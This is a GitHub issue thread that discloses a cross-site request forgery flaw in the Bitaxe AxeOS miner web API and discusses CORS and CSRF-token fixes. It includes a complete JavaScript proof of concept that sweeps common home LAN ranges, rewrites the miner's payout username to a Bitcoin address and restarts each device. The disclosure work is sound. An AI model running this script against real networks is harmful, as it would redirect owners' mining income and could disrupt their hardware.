bitaxeorg/ESP-Miner #630: CSRF Vulnerability

shaunography, 2025-01-08:
**Describe the bug**
The AxeOS Web Applicatioin is vulnerable to CSRF attacks. The settings page in particular is a good target as a CSRF attack can be used to update miner settings including the Stratum user and therefore the BTC payout address. Other settings could also be tampered to frequencies and things and potentially damage the device.

**To Reproduce**
A Proof of Concept (POC) can be found here ([https://poc.snotra.cloud/bitaxe.html](https://poc.snotra.cloud/bitaxe.html))

The site is just come simple Javascript that loops over IPs in the 192.168.1.0/24 and 192.168.0.0/24 network ranges and sends a PATCH request to the /api/system API endpoint and updates the stratum user and backup user to a new username.  It then sends a POST request to /api/system/restart to restart the device and apply the settings.

If you are on a device on your LAN network and you are running a BitAxe on an IP in one of those ranges your device will restart and your stratum username will be updated to "bc1qhztuw3zmjuseqda9w600fcvany55deky26krer.csrf".

Here is the code from the POC

```
<html>
  <body>
    <script>

            for (let c = 0; c <= 255; c++) {
                    const ip = `192.168.1.${c}`;
                    var xhr = new XMLHttpRequest();
                    xhr.open("PATCH", "http:\/\/"+`${ip}`+"\/api\/system", true);
                    xhr.setRequestHeader("Accept", "application\/json, text\/plain, *\/*");
                    xhr.setRequestHeader("Content-Type", "application\/json");
                    var body = "{\"stratumUser\":\"bc1qhztuw3zmjuseqda9w600fcvany55deky26krer.csrf\",\"fallbackStratumUser\":\"bc1qhztuw3zmjuseqda9w600fcvany55deky26krer.csrf\"}";
                    var aBody = new Uint8Array(body.length);
                    for (var i = 0; i < aBody.length; i++)
                      aBody[i] = body.charCodeAt(i); 
                    xhr.send(new Blob([aBody]));

                    var xhr = new XMLHttpRequest();
                    xhr.open("POST", "http:\/\/"+`${ip}`+"\/api\/system\/restart", true);
                    xhr.setRequestHeader("Accept", "application\/json, text\/plain, *\/*");
                    xhr.setRequestHeader("Content-Type", "application\/json");
                    var body = "{}";
                    xhr.send();
                }

            for (let c = 0; c <= 255; c++) {
                    const ip = `192.168.0.${c}`;
                    var xhr = new XMLHttpRequest();
                    xhr.open("PATCH", "http:\/\/"+`${ip}`+"\/api\/system", true);
                    xhr.setRequestHeader("Accept", "application\/json, text\/plain, *\/*");
                    xhr.setRequestHeader("Content-Type", "application\/json");
                    var body = "{\"stratumUser\":\"bc1qhztuw3zmjuseqda9w600fcvany55deky26krer.csrf\",\"fallbackStratumUser\":\"bc1qhztuw3zmjuseqda9w600fcvany55deky26krer.csrf\"}";
                    var aBody = new Uint8Array(body.length);
                    for (var i = 0; i < aBody.length; i++)
                      aBody[i] = body.charCodeAt(i); 
                    xhr.send(new Blob([aBody]));

                    var xhr = new XMLHttpRequest();
                    xhr.open("POST", "http:\/\/"+`${ip}`+"\/api\/system\/restart", true);
                    xhr.setRequestHeader("Accept", "application\/json, text\/plain, *\/*");
                    xhr.setRequestHeader("Content-Type", "application\/json");
                    var body = "{}";
                    xhr.send();
                }
    </script>
    <h1>Bitaxe CSRF POC</h1>
  </body>
</html>
```

**Expected behavior**
The webserver currently does not use any authentication or CSRF protections.  Additionally the web server sets the following CORS headers

Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, PUT, PATCH, DELETE, OPTIONS
Access-Control-Allow-Headers: Content-Type

This means an attacker can also read values from the API and exfiltrate them to an external server. Although a quick look over the API i didn't find any sensitive information that would be cause a signifiant impact if stolen.

**Hardware (please complete the following information):**
I have tested this on AxeOS  v2.4.5

benjamin-wilson, 2025-01-08:
AxeOS purposely provides an open API so that other systems can interact with it. Keep your LAN secure.

remcoros, 2025-01-08:
> AxeOS purposely provides an open API so that other systems can interact with it. Keep your LAN secure.

with `Access-Control-Allow-Origin: *` any website can include a piece of code targeting your local devices. this is not about lan security, it's a cross-site request attack. 

The POC doesn't work (at least in chrome) because it's served over https. But if it was served over http (as an attacker would do), it would update all your local devices.

shaunography, 2025-01-09:
Good point about chrome, didn't think of that. It does work in Firefox however. But as you say just requires the use of HTTP instead.

shaunography, 2025-01-09:
using `Access-Control-Allow-Origin: *` is an issue, but it would still be vulnerable if that header was removed. That header allows the response to be read by the script, but without it the request would still go through.

shaunography, 2025-01-09:
A few notes on potential fixes in case useful. Adding authentication would help as it would limit the window of opportunity when this issue could be exploited. But if the Victim was logged into their miner when visiting a malicious website it would still be vulnerable.

The typical approach is to use CSRF tokens, this would be a random string supplied by the server in the body of the html and is returned by the client in a hidden form field. The server checks the token is supplied and matches. This worked because the Cross-Site request would not have access to the token (unlike cookies and other authentication information). You would have to disable the `Access-Control-Allow-Origin: *` header for this to work. 

OWASP has good info on this - [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)

shaunography, 2025-01-09:
HTTP POC that works in chrome 

http://poc.snotra.cloud:8888/bitaxe.html

shaunography, 2025-01-09:
Great i will test it, but my suspicion is that if the Access-Control-Allow-Origin: * header is still set the origin will be allowed. You don't have the Access-Control-Allow-Credentials: true header set. If the credential header was set, the Access-Control-Allow-Origin: * would be ignored by the browser (this is why a lot of APIs will just echo back the origin in that header)

shaunography, 2025-01-10:
Looks good, non internal cross site requests are blocked.

requests from another ips on private networks are allowed.

however FYI if the web server is running on a non standard port (8080) that will be included in the the original header and the internal IP wont be matched and it will be blocked.

skot, 2025-01-13:
Hey @shaunography thank you for reporting this! I'm commenting here as I don't think I have any other way to contact you. Can you message me on the OSMU Discord? https://discord.gg/osmu

closed 2025-01-13 by skot